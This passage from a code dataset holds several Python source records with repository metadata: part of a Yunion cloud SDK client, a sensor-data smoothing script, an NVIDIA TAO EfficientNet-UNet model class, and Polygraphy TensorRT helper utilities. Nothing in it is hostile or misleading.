**kwargs)\n else:\n raise Exception('NO valid endpoint found for %s' % service)\n else:\n raise Exception('No tenant specified')\n\n def json_request(self, service, admin_api, method, url, **kwargs):\n return self._wrapped_request(self._json_request, service, admin_api,\n method, url, **kwargs)\n\n def raw_request(self, service, admin_api, method, url, **kwargs):\n return self._wrapped_request(self._raw_request, service, admin_api,\n method, url, **kwargs)\n\n def get_urllib2_raw_request(self, service, admin_api, url, **kwargs):\n return self._wrapped_request(self._get_urllib2_raw_request, service,\n admin_api, 'GET', url, **kwargs)\n\n def from_file(self, filename):\n with open(filename, 'r') as f:\n desc = f.read()\n self.from_json(json.loads(desc))\n\n def from_json(self, desc):\n self.auth_url = desc['auth_url']\n self.username = desc['username']\n self.endpoint_type = desc['endpoint_type']\n self.set_region(desc['region'], desc.get('zone', None))\n self.tenants_info_manager = TenantInfoManager()\n self.tenants_info_manager.from_json(desc['tenants'])\n if 'default_tenant_id' in desc:\n self.set_tenant(tenant_id=desc['default_tenant_id'])\n\n def to_file(self, filename):\n with open(filename, 'w') as f:\n desc = self.to_json()\n f.write(json.dumps(desc))\n\n def to_json(self):\n desc = {}\n desc['tenants'] = self.tenants_info_manager.to_json()\n desc['username'] = self.username\n desc['auth_url'] = self.auth_url\n desc['region'] = self.region\n if self.zone:\n desc['zone'] = self.zone\n desc['endpoint_type'] = self.endpoint_type\n if self.default_tenant is not None:\n desc['default_tenant_id'] = self.default_tenant.get_id()\n return desc\n\n def is_admin(self):\n tenant = self.get_default_tenant()\n if tenant is not None:\n return tenant.is_admin()\n return False\n\n def is_system_admin(self):\n tenant = self.get_default_tenant()\n if tenant is not None:\n return tenant.is_system_admin()\n return False\n\n", "repo_name": "swordqiu/python_yunionsdk", "sub_path": "yunionclient/api/client.py", "file_name": "client.py", "file_ext": "py", "file_size_in_byte": 13847, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 68, "usage_type": "call"}, {"api_name": "yunionclient.common.http.HTTPClient", "line_number": 71, "usage_type": "attribute"}, {"api_name": "yunionclient.common.http", "line_number": 71, "usage_type": "name"}, {"api_name": "yunionclient.api.tenantinfo.TenantInfoManager", "line_number": 91, "usage_type": "call"}, {"api_name": "yunionclient.api.keypairs.KeypairManager", "line_number": 93, "usage_type": "call"}, {"api_name": "yunionclient.api.keypairs", "line_number": 93, "usage_type": "name"}, {"api_name": "yunionclient.api.zones.ZoneManager", "line_number": 94, "usage_type": "call"}, {"api_name": "yunionclient.api.zones", "line_number": 94, "usage_type": "name"}, {"api_name": "yunionclient.api.hosts.HostManager", "line_number": 95, "usage_type": "call"}, {"api_name": "yunionclient.api.hosts", "line_number": 95, "usage_type": "name"}, {"api_name": "yunionclient.api.wires.WireManager", "line_number": 96, "usage_type": "call"}, {"api_name": "yunionclient.api.wires", "line_number": 96, "usage_type": "name"}, {"api_name": "yunionclient.api.storages.StorageManager", "line_number": 97, "usage_type": "call"}, {"api_name": "yunionclient.api.storages", "line_number": 97, "usage_type": "name"}, {"api_name": "yunionclient.api.hostwires.HostwireManager", "line_number": 99, "usage_type": "call"}, {"api_name": "yunionclient.api.hostwires", "line_number": 99, "usage_type": "name"}, {"api_name": "yunionclient.api.hoststorages.HoststorageManager", "line_number": 100, "usage_type": "call"}, {"api_name": "yunionclient.api.hoststorages", "line_number": 100, "usage_type": "name"}, {"api_name": "yunionclient.api.networks.NetworkManager", "line_number": 102, "usage_type": "call"}, {"api_name": "yunionclient.api.networks", "line_number": 102, "usage_type": "name"}, {"api_name": "yunionclient.api.disks.DiskManager", "line_number": 103, "usage_type": "call"}, {"api_name": "yunionclient.api.disks", "line_number": 103, "usage_type": "name"}, {"api_name": "yunionclient.api.flavors.FlavorManager", "line_number": 105, "usage_type": "call"}, {"api_name": "yunionclient.api.flavors", "line_number": 105, "usage_type": "name"}, {"api_name": "yunionclient.api.guests.GuestManager", "line_number": 107, "usage_type": "call"}, {"api_name": "yunionclient.api.guests", "line_number": 107, "usage_type": "name"}, {"api_name": "yunionclient.api.guestnetworks.GuestnetworkManager", "line_number": 109, "usage_type": "call"}, {"api_name": "yunionclient.api.guestnetworks", "line_number": 109, "usage_type": "name"}, {"api_name": "yunionclient.api.groupnetworks.GroupnetworkManager", "line_number": 110, "usage_type": "call"}, {"api_name": "yunionclient.api.groupnetworks", "line_number": 110, "usage_type": "name"}, {"api_name": "yunionclient.api.guestdisks.GuestdiskManager", "line_number": 111, "usage_type": "call"}, {"api_name": "yunionclient.api.guestdisks", "line_number": 111, "usage_type": "name"}, {"api_name": "yunionclient.api.groupguests.GroupguestManager", "line_number": 113, "usage_type": "call"}, {"api_name": "yunionclient.api.groupguests", "line_number": 113, "usage_type": "name"}, {"api_name": "yunionclient.api.usages.UsageManager", "line_number": 115, "usage_type": "call"}, {"api_name": "yunionclient.api.usages", "line_number": 115, "usage_type": "name"}, {"api_name": "yunionclient.api.images.ImageManager", "line_number": 117, "usage_type": "call"}, {"api_name": "yunionclient.api.images", "line_number": 117, "usage_type": "name"}, {"api_name": "yunionclient.api.vncproxy.VNCProxyManager", "line_number": 119, "usage_type": "call"}, {"api_name": "yunionclient.api.vncproxy", "line_number": 119, "usage_type": "name"}, {"api_name": "yunionclient.api.sshrelay.SSHRelayManager", "line_number": 121, "usage_type": "call"}, {"api_name": "yunionclient.api.sshrelay", "line_number": 121, "usage_type": "name"}, {"api_name": "yunionclient.api.logs.LogManager", "line_number": 123, "usage_type": "call"}, {"api_name": "yunionclient.api.logs", "line_number": 123, "usage_type": "name"}, {"api_name": "yunionclient.api.quotas.QuotaManager", "line_number": 125, "usage_type": "call"}, {"api_name": "yunionclient.api.quotas", "line_number": 125, "usage_type": "name"}, {"api_name": "yunionclient.api.scheduler.SchedulerManager", "line_number": 127, "usage_type": "call"}, {"api_name": "yunionclient.api.scheduler", "line_number": 127, "usage_type": "name"}, {"api_name": "yunionclient.api.users.UserManager", "line_number": 129, "usage_type": "call"}, {"api_name": "yunionclient.api.users", "line_number": 129, "usage_type": "name"}, {"api_name": "yunionclient.api.tenants.TenantManager", "line_number": 130, "usage_type": "call"}, {"api_name": "yunionclient.api.tenants", "line_number": 130, "usage_type": "name"}, {"api_name": "yunionclient.api.projects.ProjectManager", "line_number": 131, "usage_type": "call"}, {"api_name": "yunionclient.api.projects", "line_number": 131, "usage_type": "name"}, {"api_name": "yunionclient.api.groups.GroupManager", "line_number": 132, "usage_type": "call"}, {"api_name": "yunionclient.api.groups", "line_number": 132, "usage_type": "name"}, {"api_name": "yunionclient.api.roles.RoleManager", "line_number": 133, "usage_type": "call"}, {"api_name": "yunionclient.api.roles", "line_number": 133, "usage_type": "name"}, {"api_name": "yunionclient.api.groupusers.GroupuserManager", "line_number": 134, "usage_type": "call"}, {"api_name": "yunionclient.api.groupusers", "line_number": 134, "usage_type": "name"}, {"api_name": "yunionclient.api.ec2credentials.EC2CredentialManager", "line_number": 136, "usage_type": "call"}, {"api_name": "yunionclient.api.ec2credentials", "line_number": 136, "usage_type": "name"}, {"api_name": "yunionclient.api.services.ServiceManager", "line_number": 137, "usage_type": "call"}, {"api_name": "yunionclient.api.services", "line_number": 137, "usage_type": "name"}, {"api_name": "yunionclient.api.endpoints.EndpointManager", "line_number": 138, "usage_type": "call"}, {"api_name": "yunionclient.api.endpoints", "line_number": 138, "usage_type": "name"}, {"api_name": "yunionclient.api.secgroups.SecuritygroupManager", "line_number": 140, "usage_type": "call"}, {"api_name": "yunionclient.api.secgroups", "line_number": 140, "usage_type": "name"}, {"api_name": "yunionclient.api.dnsrecords.DNSRecordManager", "line_number": 142, "usage_type": "call"}, {"api_name": "yunionclient.api.dnsrecords", "line_number": 142, "usage_type": "name"}, {"api_name": "yunionclient.api.baremetalagents.BaremetalAgentManager", "line_number": 144, "usage_type": "call"}, {"api_name": "yunionclient.api.baremetalagents", "line_number": 144, "usage_type": "name"}, {"api_name": "yunionclient.api.baremetals.BaremetalManager", "line_number": 145, "usage_type": "call"}, {"api_name": "yunionclient.api.baremetals", "line_number": 145, "usage_type": "name"}, {"api_name": "yunionclient.api.baremetalnetworks.BaremetalnetworkManager", "line_number": 146, "usage_type": "call"}, {"api_name": "yunionclient.api.baremetalnetworks", "line_number": 146, "usage_type": "name"}, {"api_name": "yunionclient.api.baremetalstorages.BaremetalstorageManager", "line_number": 147, "usage_type": "call"}, {"api_name": "yunionclient.api.baremetalstorages", "line_number": 147, "usage_type": "name"}, {"api_name": "yunionclient.api.reservedips.ReservedIPManager", "line_number": 149, "usage_type": "call"}, {"api_name": "yunionclient.api.reservedips", "line_number": 149, "usage_type": "name"}, {"api_name": "yunionclient.api.schedtags.SchedtagManager", "line_number": 151, "usage_type": "call"}, {"api_name": "yunionclient.api.schedtags", "line_number": 151, "usage_type": "name"}, {"api_name": "yunionclient.api.schedtags.SchedtagHostManager", "line_number": 152, "usage_type": "call"}, {"api_name": "yunionclient.api.schedtags", "line_number": 152, "usage_type": "name"}, {"api_name": "yunionclient.api.stats.RegionStatsManager", "line_number": 154, "usage_type": "call"}, {"api_name": "yunionclient.api.metadatas.MetadataManager", "line_number": 155, "usage_type": "call"}, {"api_name": "yunionclient.api.metadatas", "line_number": 155, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerManager", "line_number": 156, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 156, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerListenerManager", "line_number": 157, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 157, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerListenerRuleManager", "line_number": 158, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 158, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerCertificateManager", "line_number": 159, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 159, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerBackendGroupManager", "line_number": 160, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 160, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerBackendManager", "line_number": 161, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 161, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerAclManager", "line_number": 162, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 162, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerClusterManager", "line_number": 164, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 164, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerAgentManager", "line_number": 165, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 165, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 172, "usage_type": "call"}, {"api_name": "yunionclient.api.tenantinfo.TenantInfo", "line_number": 194, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 206, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 209, "usage_type": "call"}, {"api_name": "yunionclient.api.tenantinfo.TenantInfo", "line_number": 226, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 234, "usage_type": "call"}, {"api_name": "yunionclient.api.tenantinfo.TenantInfo", "line_number": 243, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 324, "usage_type": "call"}, {"api_name": "yunionclient.api.tenantinfo.TenantInfoManager", "line_number": 331, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 339, "usage_type": "call"}]}
+{"seq_id": "4852226072", "text": "#!/bin/python\n# cleans sensor data\n# christopher pietsch\nimport sys\nfrom scipy.ndimage import gaussian_filter1d\nimport numpy as np\n \n_i=sys.argv[1]\n_o=sys.argv[2]\n \nf = open(_i, \"r\")\nrl=f.readlines()\n \na=[]\nfor l in rl:\n i = l.split(', ')[1:]\n x=float(i[0])\n y=float(i[1].rstrip('\\n'))\n a.append((x, y))\n \nna=np.array(a)\n \nx, y = na.T\nt = np.linspace(0, 1, len(x))\nt2 = np.linspace(0, 1, 100)\n \nx2 = np.interp(t2, t, x)\ny2 = np.interp(t2, t, y)\nsigma = 10\nx3 = gaussian_filter1d(x2, sigma)\ny3 = gaussian_filter1d(y2, sigma)\n \nx4 = np.interp(t, t2, x3)\ny4 = np.interp(t, t2, y3)\n \nfo=open(_o, 'a')\nfor p in range(len(x3)):\n fo.write(str(x3[p])+\", \"+str(y3[p])+\"\\n\")\n \nfo.close()", "repo_name": "cpietsch/deepsweep", "sub_path": "preprocess/clean.py", "file_name": "clean.py", "file_ext": "py", "file_size_in_byte": 694, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 8, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 9, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 28, "usage_type": "call"}, {"api_name": "scipy.ndimage.gaussian_filter1d", "line_number": 30, "usage_type": "call"}, {"api_name": "scipy.ndimage.gaussian_filter1d", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 34, "usage_type": "call"}]}
+{"seq_id": "20615300481", "text": "# Copyright (c) 2023, NVIDIA CORPORATION. All rights reserved.\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\n\"\"\"EfficientNet Unet model class that takes care of constructing and validating a model.\"\"\"\r\n\r\nimport logging\r\nimport keras\r\nfrom keras.models import Model\r\n\r\nfrom nvidia_tao_tf1.core.templates.efficientnet import EfficientNetB0\r\nfrom nvidia_tao_tf1.cv.unet.model.layers import Conv2DTranspose_block\r\nfrom nvidia_tao_tf1.cv.unet.model.unet_model import UnetModel\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\neff_dict = {'efficientnet_b0': ('block1a_project_bn', 'block2a_project_bn',\r\n 'block3a_project_bn', 'block5a_project_bn')}\r\n\r\n\r\nclass EfficientUnet(UnetModel):\r\n \"\"\"Efficientnet Unet class.\"\"\"\r\n\r\n def __init__(self, *args, **kwargs):\r\n \"\"\"Init function.\r\n\r\n Args:\r\n num_layers (int): Number of layers for scalable feature extractors.\r\n use_pooling (bool): Whether to add pooling layers to the feature extractor.\r\n use_batch_norm (bool): Whether to add batch norm layers.\r\n dropout_rate (float): Fraction of the input units to drop. 0.0 means dropout is\r\n not used.\r\n target_class_names (list): A list of target class names.\r\n freeze_pretrained_layers (bool): Prevent updates to pretrained layers' parameters.\r\n allow_loaded_model_modification (bool): Allow loaded model modification.\r\n template (str): Model template to use for feature extractor.\r\n freeze_bn (bool): The boolean to freeze BN or not.\r\n load_graph (bool): The boolean to laod graph for phase 1.\r\n \"\"\"\r\n super(EfficientUnet, self).__init__(*args, **kwargs)\r\n\r\n def construct_decoder_model(self, encoder_model, export=False):\r\n \"\"\"Construct the decoder for Unet with EfficientNet as backbone.\r\n\r\n Args:\r\n encoder_model (keras.model): keras model type.\r\n export (bool): Set the inference flag to build the\r\n inference model with softmax.\r\n Returns:\r\n model (keras.model): The entire Unet model with encoder and decoder.\r\n \"\"\"\r\n B1, B2, B3, B4 = eff_dict[self.template]\r\n S2 = encoder_model.get_layer(B1).output\r\n S3 = encoder_model.get_layer(B2).output\r\n S4 = encoder_model.get_layer(B3).output\r\n S5 = encoder_model.get_layer(B4).output\r\n skips = [S2, S3, S4, S5]\r\n out = encoder_model.output\r\n for filter_tmp in [512, 256, 128, 64, 32]:\r\n if skips:\r\n skip_to_use = skips.pop()\r\n else:\r\n skip_to_use = None\r\n out = Conv2DTranspose_block(input_tensor=out, filters=filter_tmp,\r\n initializer=\"glorot_uniform\",\r\n skip=skip_to_use,\r\n use_batchnorm=self.use_batch_norm,\r\n freeze_bn=self.freeze_bn)\r\n\r\n out = keras.layers.Conv2D(self.num_target_classes, (1, 1), padding='same',\r\n data_format=\"channels_first\")(out)\r\n if export:\r\n logger.debug(\"Building model for export\")\r\n out = self.get_activation_for_export(out)\r\n\r\n model_unet = Model(inputs=encoder_model.input, outputs=out)\r\n return model_unet\r\n\r\n def get_base_model(self, args, kwargs):\r\n \"\"\"Function to construct model specific backbone.\"\"\"\r\n\r\n model_class = EfficientNetB0\r\n kwargs['add_head'] = False\r\n kwargs['input_tensor'] = args[1]\r\n kwargs['stride16'] = True\r\n while args:\r\n args.pop()\r\n\r\n model = model_class(*args, **kwargs)\r\n\r\n return model\r\n", "repo_name": "NVIDIA/tao_tensorflow1_backend", "sub_path": "nvidia_tao_tf1/cv/unet/model/efficientnet_unet.py", "file_name": "efficientnet_unet.py", "file_ext": "py", "file_size_in_byte": 4343, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 25, "usage_type": "call"}, {"api_name": "nvidia_tao_tf1.cv.unet.model.unet_model.UnetModel", "line_number": 32, "usage_type": "name"}, {"api_name": "nvidia_tao_tf1.cv.unet.model.layers.Conv2DTranspose_block", "line_number": 75, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 81, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 81, "usage_type": "attribute"}, {"api_name": "keras.models.Model", "line_number": 87, "usage_type": "call"}, {"api_name": "nvidia_tao_tf1.core.templates.efficientnet.EfficientNetB0", "line_number": 93, "usage_type": "name"}]}
+{"seq_id": "70315572647", "text": "import contextlib\nimport json\nimport os\nimport signal\n\nfrom polygraphy import config, mod, util\nfrom polygraphy.common import TensorMetadata\nfrom polygraphy.exception import PolygraphyException\nfrom polygraphy.logger import G_LOGGER, LogMode\n\ntrt = mod.lazy_import(\"tensorrt\")\nnp = mod.lazy_import(\"numpy\")\n\n\nTRT_LOGGER = None\n\n\n@mod.export()\ndef get_trt_logger():\n \"\"\"\n Get the global TensorRT logger created by Polygraphy.\n\n Returns:\n trt.Logger: The TensorRT logger.\n \"\"\"\n global TRT_LOGGER\n\n LoggerType = trt.Logger\n if mod.version(trt.__version__) >= mod.version(\"8.0\"):\n\n class CustomTrtLogger(trt.ILogger):\n def __init__(self):\n trt.ILogger.__init__(self)\n\n def log(self, severity, msg):\n try:\n log_func = {\n # This function cannot throw, so `critical` should not be used here!\n trt.Logger.INTERNAL_ERROR: G_LOGGER.error,\n trt.Logger.ERROR: G_LOGGER.error,\n # Reduce warning spam from TRT.\n trt.Logger.WARNING: lambda msg: G_LOGGER.warning(msg, mode=LogMode.ONCE),\n trt.Logger.INFO: G_LOGGER.verbose,\n trt.Logger.VERBOSE: G_LOGGER.extra_verbose,\n }.get(severity, G_LOGGER.super_verbose)\n\n log_func(msg)\n except KeyboardInterrupt:\n # `log()` is `noexcept` so we need to convert exceptions to signals so that\n # ctrl-C will work as expected.\n os.kill(os.getpid(), signal.SIGTERM)\n\n LoggerType = CustomTrtLogger\n\n if TRT_LOGGER is None:\n TRT_LOGGER = LoggerType()\n return TRT_LOGGER\n\n\ndef _should_use_v3_api():\n return mod.version(trt.__version__) > mod.version(\"8.5.0.9\")\n\n\ndef fail_unavailable(what):\n G_LOGGER.backtrace()\n G_LOGGER.critical(f\"{what} is not available on TensorRT version {trt.__version__}.\")\n\n\ndef check_onnx_parser_errors(parser, success):\n if parser.num_errors > 0:\n for index in range(parser.num_errors):\n G_LOGGER.error(parser.get_error(index))\n G_LOGGER.critical(\"Could not parse ONNX correctly\")\n\n if not success:\n G_LOGGER.critical(\"Failed to parse ONNX model. Does the model file exist and contain a valid ONNX model?\")\n\n\ndef get_layer_class_mapping():\n layer_class_mapping = {}\n\n def try_add(layer_type, layer_cls):\n try:\n layer_type = getattr(trt.LayerType, layer_type)\n layer_cls = getattr(trt, layer_cls)\n except AttributeError:\n if config.INTERNAL_CORRECTNESS_CHECKS:\n G_LOGGER.warning(f\"Could not find layer type: {layer_type} or layer class: {layer_cls}\")\n else:\n layer_class_mapping[layer_type] = layer_cls\n\n try_add(\"CONVOLUTION\", \"IConvolutionLayer\")\n try_add(\"FULLY_CONNECTED\", \"IFullyConnectedLayer\")\n try_add(\"ACTIVATION\", \"IActivationLayer\")\n try_add(\"POOLING\", \"IPoolingLayer\")\n try_add(\"LRN\", \"ILRNLayer\")\n try_add(\"SCALE\", \"IScaleLayer\")\n try_add(\"SOFTMAX\", \"ISoftMaxLayer\")\n try_add(\"DECONVOLUTION\", \"IDeconvolutionLayer\")\n try_add(\"CONCATENATION\", \"IConcatenationLayer\")\n try_add(\"ELEMENTWISE\", \"IElementWiseLayer\")\n try_add(\"PLUGIN\", \"IPluginLayer\")\n try_add(\"UNARY\", \"IUnaryLayer\")\n try_add(\"PADDING\", \"IPaddingLayer\")\n try_add(\"SHUFFLE\", \"IShuffleLayer\")\n try_add(\"REDUCE\", \"IReduceLayer\")\n try_add(\"TOPK\", \"ITopKLayer\")\n try_add(\"GATHER\", \"IGatherLayer\")\n try_add(\"MATRIX_MULTIPLY\", \"IMatrixMultiplyLayer\")\n try_add(\"RAGGED_SOFTMAX\", \"IRaggedSoftMaxLayer\")\n try_add(\"CONSTANT\", \"IConstantLayer\")\n try_add(\"RNN\", \"IRNNLayer\")\n try_add(\"RNN_V2\", \"IRNNv2Layer\")\n try_add(\"IDENTITY\", \"IIdentityLayer\")\n try_add(\"PLUGIN_V2\", \"IPluginV2Layer\")\n try_add(\"SLICE\", \"ISliceLayer\")\n try_add(\"SHAPE\", \"IShapeLayer\")\n try_add(\"PARAMETRIC_RELU\", \"IParametricReLULayer\")\n try_add(\"RESIZE\", \"IResizeLayer\")\n try_add(\"TRIP_LIMIT\", \"ITripLimitLayer\")\n try_add(\"RECURRENCE\", \"IRecurrenceLayer\")\n try_add(\"ITERATOR\", \"IIteratorLayer\")\n try_add(\"LOOP_OUTPUT\", \"ILoopOutputLayer\")\n try_add(\"SELECT\", \"ISelectLayer\")\n try_add(\"FILL\", \"IFillLayer\")\n try_add(\"QUANTIZE\", \"IQuantizeLayer\")\n try_add(\"DEQUANTIZE\", \"IDequantizeLayer\")\n try_add(\"CONDITION\", \"IConditionLayer\")\n try_add(\"CONDITIONAL_INPUT\", \"IIfConditionalInputLayer\")\n try_add(\"CONDITIONAL_OUTPUT\", \"IIfConditionalOutputLayer\")\n try_add(\"ASSERTION\", \"IAssertionLayer\")\n try_add(\"SCATTER\", \"IScatterLayer\")\n try_add(\"EINSUM\", \"IEinsumLayer\")\n try_add(\"GRID_SAMPLE\", \"IGridSampleLayer\")\n try_add(\"ONE_HOT\", \"IOneHotLayer\")\n try_add(\"NON_ZERO\", \"INonZeroLayer\")\n try_add(\"NMS\", \"INMSLayer\")\n try_add(\"REVERSE_SEQUENCE\", \"IReverseSequenceLayer\")\n try_add(\"NORMALIZATION\", \"INormalizationLayer\")\n try_add(\"CAST\", \"ICastLayer\")\n\n return layer_class_mapping\n\ndef check_numpy_trt_compatibility():\n if mod.version(trt.__version__) < mod.version(\"8.6\") and \\\n mod.version(np.__version__) >= mod.version(\"1.24\"):\n # TensorRT < 8.6 uses a deprecated alias np.bool that was removed in NumPy >= 1.24\n G_LOGGER.warning(f\"TensorRT version {trt.__version__} and NumPy version {np.__version__} \"\n \"are not compatible. Consider downgrading your NumPy package to a version < 1.24 \"\n \"or upgrading TensorRT to a version >= 8.6.\", mode=LogMode.ONCE)\n\n\ndef np_dtype_from_trt(trt_dtype):\n # trt.nptype uses NumPy, so to make autoinstall work, we need to trigger it before that.\n mod.autoinstall(np)\n check_numpy_trt_compatibility()\n return np.dtype(trt.nptype(trt_dtype))\n\n\ndef get_network_input_names_meta(network):\n names = []\n meta = TensorMetadata()\n for i in range(network.num_inputs):\n tensor = network.get_input(i)\n names.append(tensor.name)\n meta.add(name=tensor.name, dtype=np_dtype_from_trt(tensor.dtype), shape=tensor.shape)\n return names, meta\n\n\ndef get_network_output_names_meta(network):\n names = []\n meta = TensorMetadata()\n for i in range(network.num_outputs):\n tensor = network.get_output(i)\n names.append(tensor.name)\n meta.add(name=tensor.name, dtype=np_dtype_from_trt(tensor.dtype), shape=tensor.shape)\n return names, meta\n\n\ndef get_layer_input_names_meta(layer):\n names = []\n meta = TensorMetadata()\n for i in range(layer.num_inputs):\n inp = layer.get_input(i)\n if inp:\n names.append(inp.name)\n meta.add(inp.name, np_dtype_from_trt(inp.dtype), inp.shape)\n return names, meta\n\n\ndef get_layer_output_names_meta(layer):\n names = []\n meta = TensorMetadata()\n for i in range(layer.num_outputs):\n out = layer.get_output(i)\n if out:\n names.append(out.name)\n meta.add(out.name, np_dtype_from_trt(out.dtype), out.shape)\n return names, meta\n\n\ndef str_from_layer(layer, index):\n input_names, input_meta = get_layer_input_names_meta(layer)\n output_names, output_meta = get_layer_output_names_meta(layer)\n return util.str_from_layer(\n \"Layer\", index, layer.name, layer.type, input_names, input_meta, output_names, output_meta\n )\n\n\ndef get_layer_attribute_names(layer):\n def is_special_attribute(attr):\n return attr.startswith(\"__\") and attr.endswith(\"__\")\n\n def is_valid_attribute(attr, layer):\n if (\n type(layer) == trt.IPoolingLayer\n or type(layer) == trt.IConvolutionLayer\n or type(layer) == trt.IDeconvolutionLayer\n ):\n if len(layer.get_input(0).shape) > 4:\n # 3D pooling uses padding_nd\n return attr not in [\"padding\", \"stride\", \"window_size\"]\n if type(layer) == trt.IResizeLayer:\n if layer.num_inputs > 1:\n return attr not in [\"scales\"]\n if type(layer) == trt.ISliceLayer:\n if layer.num_inputs > 1:\n return attr not in [\"shape\", \"start\", \"stride\"]\n return True\n\n return [\n attr\n for attr in dir(layer)\n if not is_special_attribute(attr) and not hasattr(trt.ILayer, attr) and is_valid_attribute(attr, layer)\n ]\n\n\ndef str_from_network(network, show_layers=None, show_attrs=None, show_weights=None):\n \"\"\"\n Converts a TensorRT network to a human-readable representation\n\n Args:\n network (trt.INetworkDefinition): The network.\n show_layers (bool): Whether to display per-layer information.\n show_attrs (bool): Whether to display per-layer attributes.\n show_weights (bool): Whether to display the value of weights.\n\n Returns:\n str\n \"\"\"\n show_layers = util.default(show_layers, False)\n show_attrs = util.default(show_attrs, False)\n show_weights = util.default(show_weights, False)\n\n LAYER_TYPE_CLASS_MAPPING = get_layer_class_mapping()\n\n network_str = f\"Name: {network.name} | {'Implicit' if hasattr(network, 'has_implicit_batch_dimension') and network.has_implicit_batch_dimension else 'Explicit'} Batch Network{' with Explicit Precision ' if hasattr(network, 'has_explicit_precision') and network.has_explicit_precision else ''}\\n\"\n network_str += \"\\n\"\n\n _, input_metadata = get_network_input_names_meta(network)\n network_str += f\"---- {len(input_metadata)} Network Input(s) ----\\n{input_metadata}\\n\\n\"\n _, output_metadata = get_network_output_names_meta(network)\n network_str += f\"---- {len(output_metadata)} Network Output(s) ----\\n{output_metadata}\\n\\n\"\n network_str += f\"---- {network.num_layers} Layer(s) ----\\n\"\n if show_layers:\n for index, layer in enumerate(network):\n if layer.type in LAYER_TYPE_CLASS_MAPPING:\n layer.__class__ = LAYER_TYPE_CLASS_MAPPING[layer.type]\n\n network_str += str_from_layer(layer, index)\n\n if show_attrs:\n # Exclude special attributes, as well as any attributes of the base layer class (those can be displayed above).\n attrs = get_layer_attribute_names(layer)\n if attrs:\n network_str += util.indent_block(\"---- Attributes ----\") + \"\\n\"\n for attr in attrs:\n with G_LOGGER.verbosity():\n val = getattr(layer, attr)\n if show_weights or not isinstance(val, np.ndarray):\n attr_str = \"\"\n if layer.name:\n attr_str += f\"{layer.name}.\"\n network_str += util.indent_block(f\"{attr_str}{attr} = {val}\") + \"\\n\"\n network_str += \"\\n\"\n\n return util.indent_block(network_str, level=0)\n\n\ndef get_all_tensors(network):\n all_tensors = set()\n for layer in network:\n for i in range(layer.num_inputs):\n all_tensors.add(layer.get_input(i))\n for i in range(layer.num_outputs):\n all_tensors.add(layer.get_output(i))\n # Optional tensors that are omitted are reported as `None`s, so we need to exclude them.\n return {t.name: t for t in all_tensors if t is not None}\n\n\ndef mark_outputs(network, outputs):\n \"\"\"\n Mark the specified outputs as network outputs.\n\n Args:\n network (trt.INetworkDefinition): The network in which to mark outputs.\n outputs (Sequence[str]): The names of tensors to mark as outputs.\n \"\"\"\n outputs = util.unique_list(outputs)\n\n tensor_map = get_all_tensors(network)\n util.check_sequence_contains(\n tensor_map.keys(), outputs, name=\"the network\", items_name=\"outputs\", check_extra=False\n )\n\n for tensor in tensor_map.values():\n # Clear all old outputs\n if tensor.is_network_output:\n network.unmark_output(tensor)\n\n for name in outputs:\n G_LOGGER.ultra_verbose(f\"Marking {name} as an output\")\n network.mark_output(tensor_map[name])\n\n\ndef mark_layerwise(network):\n # Layers within loops cannot be marked as network outputs.\n LOOP_START_NAMES = [\"TRIP_LIMIT\", \"ITERATOR\", \"RECURRENCE\"]\n LOOP_END_NAMES = [\"LOOP_OUTPUT\"]\n LOOP_START_LAYERS = [getattr(trt.LayerType, attr) for attr in LOOP_START_NAMES 